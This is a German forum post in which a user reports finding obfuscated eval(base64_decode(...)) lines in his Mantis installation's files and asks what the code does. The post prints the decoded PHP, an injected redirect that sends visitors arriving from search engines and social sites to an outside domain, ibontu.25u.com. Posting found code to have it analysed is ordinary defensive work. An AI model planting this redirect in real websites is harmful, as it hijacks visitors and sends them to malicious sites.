Thema: PHP Virus ?

Einzelnen Beitrag anzeigen

Benutzerbild von haentschman
haentschman

Registriert seit: 24. Okt 2006
Ort: Seifhennersdorf / Sachsen
5.298 Beiträge
 
Delphi 12 Athens
 
#1

PHP Virus ?

  Alt 3. Jan 2016, 13:00
Hallöle...

Beim Download der Config Datei meines Mantis wurde ein Virus gefunden... Hä... Wie jetzt?

In der ersten Zeile einiger (aller?) Dateien war das Muster:
Code:
eval(base64_decode("DQplcnJvcl9yZXBvcnR...l9DQp9DQp9"));
vorhanden.
Ein Decode ergibt folgenden Code:
Zitat:
<?php error_reporting(0);
$qazplm = headers_sent();
if (!$qazplm) {
$referer = $_SERVER['HTTP_REFERER'];
$uag = $_SERVER['HTTP_USER_AGENT'];
if ($uag) {
if (!stristr($uag, "MSIE 7.0") and !stristr($uag, "MSIE 6.0")) {
if (stristr($referer, "yahoo") or stristr($referer, "bing") or stristr($referer, "rambler") or stristr($referer, "live.com") or stristr($referer, "webalta") or stristr($referer, "bit.ly") or stristr($referer, "tinyurl.com") or preg_match("/yandex\.ru\/yandsearch\?(.*?)\&lr\=/", $referer) or preg_match("/google\.(.*?)\/url\?sa/", $referer) or stristr($referer, "myspace.com") or stristr($referer, "facebook.com/l") or stristr($referer, "aol.com")) {
if (!stristr($referer, "cache") or !stristr($referer, "inurl")) {
header("Location: http://ibontu.25u.com/");
exit();
}
}
}
}
}
Was macht der Code genau?

Geändert von haentschman ( 3. Jan 2016 um 13:25 Uhr)
  Mit Zitat antworten Zitat